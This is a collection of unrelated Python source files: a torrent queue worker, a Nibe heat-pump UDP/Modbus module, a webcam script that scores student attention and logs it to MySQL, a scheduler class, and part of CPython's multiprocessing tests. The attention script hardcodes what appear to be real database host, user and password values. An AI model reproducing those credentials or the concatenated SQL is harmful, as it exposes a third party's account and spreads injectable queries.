size_sql_where = 'where `length`<=' + str(size_limit)
sql = "select * from pl_hash_queue " + size_sql_where + \
" order by created_at desc " + \
size_sql + " limit " + str(add)
info = self.query(sql)
info_len = len(info)
if info_len == 0:
print self.debug('queue data is empty ... ')
else:
for x in range(info_len):
self.add_hash_task(info[x][1])
self.execute(
'delete from pl_hash_queue where id=' + str(info[x][0]))
print self.debug("------------ do queue task end ! ---------------")
time.sleep(TASK_RATE)
def test():
while True:
print self.debug("no download task!")
time.sleep(1)
test()
if __name__ == "__main__":
dl = downloadBT()
import threading
check_task = threading.Thread(target=dl.check_task)
check_task.start()
completed = threading.Thread(target=dl.completed)
completed.start()
queue = threading.Thread(target=dl.queue)
queue.start()
|
14107_NibeWP (14107).py | # coding: UTF-8
# Copyright 2021 T. Paul</p>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import socket
import threading
import urllib2
##!!!!##################################################################################################
#### Own written code can be placed above this commentblock . Do not change or delete commentblock! ####
########################################################################################################
##** Code created by generator - DO NOT CHANGE! **##
class NibeWP_14107_14107(hsl20_4.BaseModule):
def __init__(self, homeserver_context):
hsl20_4.BaseModule.__init__(self, homeserver_context, "14107_NibeWP")
self.FRAMEWORK = self._get_framework()
self.LOGGER = self._get_logger(hsl20_4.LOGGING_NONE,())
self.PIN_I_S_GWIP=1
self.PIN_I_N_GWPORTGET=2
self.PIN_I_N_GWPORTSET=3
self.PIN_I_N_HSPORT=4
self.PIN_I_S_CMDSET=5
self.PIN_I_S_CMDGET=6
self.PIN_I_S_REG01=7
self.PIN_I_S_REG02=8
self.PIN_I_S_REG03=9
self.PIN_I_S_REG04=10
self.PIN_I_S_REG05=11
self.PIN_I_S_REG06=12
self.PIN_I_S_REG07=13
self.PIN_I_S_REG08=14
self.PIN_I_S_REG09=15
self.PIN_I_S_REG10=16
self.PIN_I_S_REG11=17
self.PIN_I_S_REG12=18
self.PIN_I_S_REG13=19
self.PIN_I_S_REG14=20
self.PIN_I_S_REG15=21
self.PIN_I_S_REG16=22
self.PIN_I_S_REG17=23
self.PIN_I_S_REG18=24
self.PIN_I_S_REG19=25
self.PIN_I_S_REG20=26
self.PIN_O_S_VALUES=1
self.PIN_O_S_MODEL=2
self.PIN_O_N_VER=3
self.PIN_O_N_GETREG=4
self.PIN_O_N_REG01=5
self.PIN_O_N_REG02=6
self.PIN_O_N_REG03=7
self.PIN_O_N_REG04=8
self.PIN_O_N_REG05=9
self.PIN_O_N_REG06=10
self.PIN_O_N_REG07=11
self.PIN_O_N_REG08=12
self.PIN_O_N_REG09=13
self.PIN_O_N_REG10=14
self.PIN_O_N_REG11=15
self.PIN_O_N_REG12=16
self.PIN_O_N_REG13=17
self.PIN_O_N_REG14=18
self.PIN_O_N_REG15=19
self.PIN_O_N_REG16=20
self.PIN_O_N_REG17=21
self.PIN_O_N_REG18=22
self.PIN_O_N_REG19=23
self.PIN_O_N_REG20=24
self.PIN_O_N_ALIVE=25
########################################################################################################
#### Own written code can be placed after this commentblock . Do not change or delete commentblock! ####
###################################################################################################!!!##
g_msg = 0
g_register = {}
g_out = {}
debug_only = False
g_bigendian = False
# Re-ordering / inversing the byte order
def shift_bytes(self, msg):
res = []
for x in msg[::-1]:
res.append(x)
return res
# Main server loop, listening for incomming messages
def listen(self):
# declare our serverSocket upon which
# we will be listening for UDP messages
server_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# One difference is that we will have to bind our declared IP address
# and port number to our newly declared server_sock
UDP_IP_ADDRESS = self.FRAMEWORK.get_homeserver_private_ip()
UDP_PORT_NO = self._get_input_value(self.PIN_I_N_HSPORT)
self.DEBUG.add_message("listen: Start listening for incoming msgs at "
+ str(UDP_IP_ADDRESS) + ":" + str(UDP_PORT_NO))
try:
server_sock.bind((UDP_IP_ADDRESS, UDP_PORT_NO))
data = ""
while True:
data = data + server_sock.recv(1024)
msg, ret = self.chk_msg(data)
if ret:
self.parse_data(msg)
data = ""
else:
if msg is None:
data = ""
except Exception as e:
self.DEBUG.add_message("ERROR listen: " + str(e) + " (abort)")
finally:
server_sock.close()
# Reads the Modbus Manager export file which is provided to the HS,
# see HS help for "hsupload"
def read_export(self):
try:
target_url = 'http://127.0.0.1:65000/logic/14107/export.csv'
datafile = urllib2.urlopen(target_url)
self.parse_export(datafile)
except Exception as e:
self.DEBUG.add_message("ERROR readExport: " + str(e))
# Parses the Modbus Manager export file and stores the content to self.g_register
def parse_export(self, datafile):
# print("Running parseExport")
self.g_register = {}
i = 0
for row in datafile:
row = row.replace('"', '')
data = row.split(';')
if len(data) < 10:
continue
# Title;Info;ID;Unit;Size;Factor;Min;Max;Default;Mode
# 0 1 2 3 4 5 6 7 8 9
try:
self.g_register[int(data[2])] = {"Title": data[0], "Size": data[4], "Factor": float(data[5]),
"Mode": data[9]}
i = i + 1
except Exception as e:
self.DEBUG.add_message("parseExport: " + str(e) + " with '" + str(data) + "'")
self.DEBUG.add_message("parseExport: Read Modbus Manager file with " + str(i) + " entries.")
# Checks the integrity of a received message
# Example:
# 5c 00 20 6d 0e 01 24 18 46 31 31 34 35 2d 31 30 20 44 45 34
# |---------- Bytes vor len count --------|
# |------------ Bytes for checksum calculation -------|
def chk_msg(self, msg):
try:
# print("Running chkMsg")
in_msg = bytearray(msg)
out_msg = []
# check for start byte
for i in range(len(in_msg)):
if (in_msg[i] == 0x5c) and (i < len(in_msg) - 1):
out_msg = in_msg[i + 1:]
break
# check if msg is complete
if len(out_msg) < 4:
return out_msg, False
msg_len = int(out_msg[3])
cnt_len = len(out_msg[4:-1])
if cnt_len < msg_len:
return out_msg, False
out_msg = out_msg[:4 + msg_len + 1]
# check checksum
msg_chk_sm = out_msg[msg_len + 4]
chksm = self.calc_chk_sm(out_msg[:-1])
if chksm != msg_chk_sm:
self.DEBUG.add_message("chkMsg: Checksum error")
self.DEBUG.set_value("Last failed msg", self.print_byte_array(in_msg))
return None, False
return out_msg, True
except Exception as e:
self.DEBUG.add_message("ERROR chkMsg: " + str(e))
# Calculates XOR checksum
def calc_chk_sm(self, msg):
chk_sm = 0x00
for x in msg:
chk_sm = chk_sm ^ x
return chk_sm
# Parses the data block of an incoming message
def parse_register(self, data, cmd6a=False):
try:
reg = 0
res = {}
i = 0
while i < len(data):
# register
reg = self.hex2int(data[i: i + 2])
# self.DEBUG.add_message("Register received: " + str(self.printByteArray(data[i: i + 2]) + " ~ " + str(reg)))
# reg = 0xffff -> skip and following data
if reg == 65535 or reg == 0:
# print("- Next register 0xffff or 0x0, skipping 4 byte")
i = i + 4
continue
i = i + 2
if reg not in self.g_register:
self.DEBUG.add_message("Register " + str(reg) + " not known. Abort parse.")
return False, res
# value
size = self.g_register[reg]["Size"]
if cmd6a:
size = size[0] + "32"
factor = self.g_register[reg]["Factor"]
if (size == "s8") or (size == "u8"):
if (data[i + 1] & 0x80 == 0x80) and (size == "s8"):
val = self.complement2(data[i:i + 2]) / factor
else:
val = self.hex2int(data[i:i + 2]) / factor
i = i + 2
elif (size == "s16") or (size == "u16"):
if (data[i + 1] & 0x80 == 0x80) and (size == "s16"):
val = self.complement2(data[i:i + 2]) / factor
else:
val = self.hex2int(data[i:i + 2]) / factor
i = i + 2
elif (size == "s32") or (size == "u32"):
# check next register
reg_next = self.hex2int(data[i + 2:i + 4])
if reg_next - reg == 1:
# print("- next register is split register")
# x32 uses next register for full value
val1 = data[i:i + 2]
i = i + 4
val2 = data[i:i + 2]
data32 = val1.append(val2)
val = self.hex2int(data32) / factor
# print("- Value: " + str(val))
i = i + 2
else:
# print("- next register is 0xffff, skip")
val = self.hex2int(data[i:i + 2]) / factor
# print("- Value: " + str(val))
i = i + 6
else:
self.DEBUG.add_message("ERROR parseRegister: size of value unknown.")
# write value
res[str(reg)] = {}
res[str(reg)]["Title"] = self.g_register[reg]["Title"]
res[str(reg)]["value"] = val
if "out" in self.g_register[reg]:
out_pin = self.g_register[reg]["out"]
if out_pin != 0:
if "Value" in self.g_register[reg]:
if self.g_register[reg]["Value"] != val:
self._set_output_value(out_pin, val)
self.g_register[reg]["Value"] = val
else:
self._set_output_value(out_pin, val)
self.g_register[reg]["Value"] = val
return True, res
except Exception as e:
self.DEBUG.add_message("ERROR parseRegister: " + str(e))
return False, None
def parse_data(self, msg):
try:
# sender = msg[0]
# addr = msg[1]
cmd = msg[2]
# length = msg[3]
data = msg[4:-2]
# crc = msg[-1]
self.DEBUG.set_value("last raw msg " + str(hex(cmd)),
str(hex(0x5c)) + " " + self.print_byte_array(msg))
# remove escaping of startbyte 0x5c
i = 0
while i < len(data) - 1:
if (data[i] == 0x5c) and (data[i + 1] == 0x5c):
data.pop(i)
print("- Removed 0x5c escaping")
i = i + 1
# 20 value register msg
if cmd == 0x68:
ok, ret = self.parse_register(data)
if not ok:
self.DEBUG.add_message("Error reading msg " + str(hex(0x5c)) + " " + self.print_byte_array(msg))
return None
jsn = str(ret).replace("'", '"') # exchange ' by "
self._set_output_value(self.PIN_O_S_VALUES, jsn)
self._set_output_value(self.PIN_O_N_ALIVE, 1)
self.DEBUG.add_message("parse_data: Received 0x68 Nibe data")
return jsn
# response for single register request
elif cmd == 0x6a:
# @todo value always 32bit!
ok, ret = self.parse_register(data, True)
if not ok:
self.DEBUG.add_message("Error reading msg " + str(hex(0x5c)) + " " + self.print_byte_array(msg))
return None
jsn = str(ret).replace("'", '"') # exchange ' by "
self._set_output_value(self.PIN_O_S_VALUES, jsn)
self.DEBUG.add_message("parse_data: Received 0x6a Nibe data")
return jsn
# ignore, seems to be a confirmation of an executed command
# 5c00206c01014c
elif cmd == 0x6c: # and $msg eq "5c00206c01014c") {
pass
# print("- Msg 0x6c not implemented")
# readingsBulkUpdate
elif cmd == 0x6d: # and substr($msg, 10, 2*$length) =~ m/(.{2})(.{4})(.*)/) {
# ver = self.hex2int(data[0:3])
ver = self.hex2int(data[1:3])
prod = data[3:]
self._set_output_value(self.PIN_O_N_VER, ver)
self._set_output_value(self.PIN_O_S_MODEL, prod)
self.DEBUG.add_message("parse_data: Received 0x6d Nibe data")
return str(str(prod) + " / " + str(ver))
# 0x5c 0x0 0x20 0xee 0x0 0xce
elif cmd == 0xee:
self.DEBUG.add_message("parse_data: Received 0xee Nibe data")
else:
pass
self.DEBUG.add_message("parse_data: Received unknown Nibe data")
except Exception as e:
self.DEBUG.add_message("ERROR parse_data: " + str(e) + " with msg " + self.print_byte_array(msg))
def int2hex(self, value, size):
if size == "s8" or size == "u8":
val1 = value & 0x00FF
val2 = value & 0xFF00
val2 = val2 >> 8
val = chr(val1) + chr(val2)
elif size == "s16" or size == "u16":
val1 = value & 0x00FF
val2 = value & 0xFF00
val2 = val2 >> 8
val = chr(val1) + chr(val2)
elif size == "s32" or size == "u32":
val1 = value & 0x000000FF
val2 = value & 0x0000FF00
val3 = value & 0x00FF0000
val4 = value & 0xFF000000
val2 = val2 >> 8
val3 = val3 >> 16
val4 = val4 >> 24
val = chr(val1) + chr(val2) + chr(val3) + chr(val4)
return val
def send_data(self, port, data):
ipaddr = str(self._get_input_value(self.PIN_I_S_GWIP))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# connect the socket, think of it as connecting the cable to the address location
s.connect((ipaddr, port))
len_send = s.send(data)
s.close()
# print("len_send = " + str(len_send) + "; len(data) = " + str(len(data)))
self.DEBUG.add_message("Msg. send to Nibe")
if len_send != len(data):
self.DEBUG.add_message("ERROR Size of data send != size of data provided in send_data")
self.DEBUG.set_value("Last send",
self.print_byte_array(bytearray(data)) + " to " + ipaddr + ":" + str(port))
def read_register(self, register):
try:
msg = "\xc0\x69\x02"
reg = self.int2hex(register, "u16")
msg = msg + reg
chksm = self.calc_chk_sm(bytearray(msg))
msg = msg + chr(chksm)
port = int(self._get_input_value(self.PIN_I_N_GWPORTGET))
self.send_data(port, msg)
except Exception as e:
self.DEBUG.add_message("ERROR readRegister: " + str(e))
def write_register(self, register, value):
try:
msg = "\xc0\x6b\x06"
reg = self.int2hex(int(register), "u16")
msg = msg + reg
mode = self.g_register[register]["Mode"]
if ("W" not in mode) and ("w" not in mode):
self.DEBUG.add_message("write_register: Register " + str(register) + " is read only. Aborting send.")
return
factor = self.g_register[register]["Factor"]
value = int(value * factor)
# size = self.g_register[register]["Size"]
value = self.int2hex(value, "u32") # u32
while len(value) < 4:
value = "\x00" + value
msg = msg + value
chksm = self.calc_chk_sm(bytearray(msg))
msg = msg + chr(chksm)
port = int(self._get_input_value(self.PIN_I_N_GWPORTSET))
self.send_data(port, msg)
except Exception as e:
self.DEBUG.add_message("ERROR write_register: " + str(e))
def print_byte_array(self, data):
s = ""
for i in range(len(data)):
s = s + " " + str(hex(data[i]))
s = s[1:]
return s
def hex2int(self, msg):
if not self.g_bigendian:
msg = self.shift_bytes(msg)
val = 0
val = val | msg[0]
for byte in msg[1:]:
val = val << 8
val = val | byte
return int(val)
# data shall not yet be re-ordered (use orig byte order)
def complement2(self, data):
for i in range(len(data)):
data[i] ^= 0xFF
val = self.hex2int(data)
val = val + 1
return -val
def test_endian(self):
data = bytearray("\x80\x00")
val = 0
val = val | data[0]
for byte in data[1:]:
val = val << 8
val = val | byte
self.DEBUG.add_message(self.print_byte_array(data) + " -> " + str(val) +
" (32768 little endian, 8 big endian)")
def init_export_csv(self):
self.read_export()
for i in range(self.PIN_I_S_REG20 - self.PIN_I_S_REG01):
out_id = self.PIN_O_N_REG01 + i
reg = self._get_input_value(self.PIN_I_S_REG01 + i)
if reg == 0:
continue
if reg in self.g_register:
self.g_register[reg]["out"] = out_id
else:
self.DEBUG.add_message("initExportCsv: Register " + str(reg) + " at EW" +
str(self.PIN_I_S_REG01 + i) +
" not defined in Mobus Manager Export.")
def on_init(self):
self.DEBUG = self.FRAMEWORK.create_debug_section()
self.g_msg = 0
self.g_register = {}
self.g_out = {}
self.g_bigendian = False
self.test_endian()
self.init_export_csv()
x = threading.Thread(target=self.listen)
if not self.debug_only:
x.start()
def on_input_value(self, index, value):
if index == self.PIN_I_S_CMDGET:
self.read_register(value)
elif index == self.PIN_I_S_CMDSET:
val = value.split(':')
register = int(val[0])
val = float(val[1])
self.write_register(register, val)
elif index >= self.PIN_I_S_REG01:
out_id = index - self.PIN_I_S_REG01 + self.PIN_O_N_REG01
self.g_register[value]["out"] = out_id
old_reg = 0
if out_id in self.g_out:
old_reg = self.g_out[out_id]
self.g_register[old_reg]["out"] = 0
self.g_out[out_id] = value
|
yuzbulanson.py | import sys
import threading
from cv2 import cv2 as cv
import time
import queue
import time
import mysql.connector
import datetime
from datetime import timedelta
mydb=mysql.connector.connect(host='94.130.57.82',user="appsplat_semih",passwd="semihsemih123",database="appsplat_semih")
mycursor =mydb.cursor()
idnum=sys.argv[1]
course=sys.argv[2]
def att(q):
sqlform = "Insert into attentionstudent(sessionID,userID,min,attentionP) values(%s,%s,NOW(),%s)"
value = q.get()
print('Average attention:',value)
#formatted_date = now.strftime('%Y-%m-%d %H:%M:%S')
#print(formatted_date)
dt = datetime.datetime.now()
#x = dt.strftime("%Y-%m-%d %H:%M:%S")
students=[(course,idnum,value)]
mycursor.executemany(sqlform, students)
mydb.commit()
return q
def th():
for _ in range(50):
thread1 = threading.Thread(target=att, args=(q,))
thread1.start()
time.sleep(1)
if __name__ == '__main__':
attention = 100
cap = cv.VideoCapture(0)
"""q = queue.LifoQueue()
Timer.Timer(10, att,[q]).start()"""
#manager = multiprocessing.Manager()
q = queue.LifoQueue()
#p = Timer.Timer(10, att, [q])
#p.start()
#thread = threading.Thread(target=att, args=(q,))
#thread.start()
thread = threading.Thread(target=th)
thread.start()
while True:
ret, frame = cap.read()
frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
frame_gray = cv.equalizeHist(frame_gray)
# -- Detect faces
face_cascade = cv.CascadeClassifier("haarcascade_frontalface_alt.xml")
eyes_cascade = cv.CascadeClassifier("haarcascade_eye_tree_eyeglasses.xml")
faces = face_cascade.detectMultiScale(frame_gray)
if any(map(len, faces)):
if attention < 96:
attention += 5
else:
if attention > 9:
attention -= 10
for (x, y, w, h) in faces:
center = (x + w // 2, y + h // 2)
frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)
faceROI = frame_gray[y:y + h, x:x + w]
# -- In each face, detect eyes
eyes = eyes_cascade.detectMultiScale(faceROI)
if any(map(len, eyes)):
if attention < 98:
attention += 3
else:
if attention > 6:
attention -= 7
for (x2, y2, w2, h2) in eyes:
eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2)
radius = int(round((w2 + h2) * 0.25))
frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4)
q.put(attention)
cv.imshow('Capture - Face detection', frame)
if cv.waitKey(10) == 27:
break
|
tasks.py | from threading import Thread
import sched
import time
class Task:
def __init__(self, type=None):
self.active = False
self.paused = False
self.thread = None
self.type = type
def __start__(self, target, period):
self.active = True
self.thread = Thread(target=self.__run_periodic__, kwargs={'target': target, 'period': period})
self.thread.start()
def __stop__(self):
self.active = False
def __run_periodic__(self, target, period):
''' If a period is passed, uses Python's sched library to
avoid timing drifts. Make sure that the passed period is longer than
the time required to call the target function.
Args:
period (float): the repetition time in seconds
'''
scheduler = sched.scheduler(time.time, time.sleep)
last_time = time.time()
while self.active:
if self.paused:
continue
new_time = time.time()
if last_time < new_time:
print('Warning: skipping missed tasks and resyncing the time cursor.')
last_time = new_time
continue
scheduler.enterabs(last_time, 1, target)
last_time += period
scheduler.run()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
